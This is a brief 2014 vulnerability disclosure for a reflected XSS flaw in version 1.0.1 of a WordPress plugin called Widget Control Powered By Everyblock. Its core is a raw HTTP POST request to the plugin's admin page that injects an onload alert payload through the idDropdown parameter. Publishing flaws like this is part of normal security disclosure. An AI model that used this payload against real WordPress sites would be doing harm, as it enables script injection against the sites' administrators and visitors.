# ============================================================== # Title ...| XSS in Widget Control Powered By Everyblock # Version .| widget-control-powered-by-everyblock.1.0.1 # Date ....| 23.02.2014 # Found ...| HauntIT Blog # Home ....| http://wordpress.org/plugins/ # ============================================================== # ============================================================== # XSS ---<request>--- POST /k/wordpress/wp-admin/admin.php?page=add-widget-slug HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 52 idDropdown='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e ---<request>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/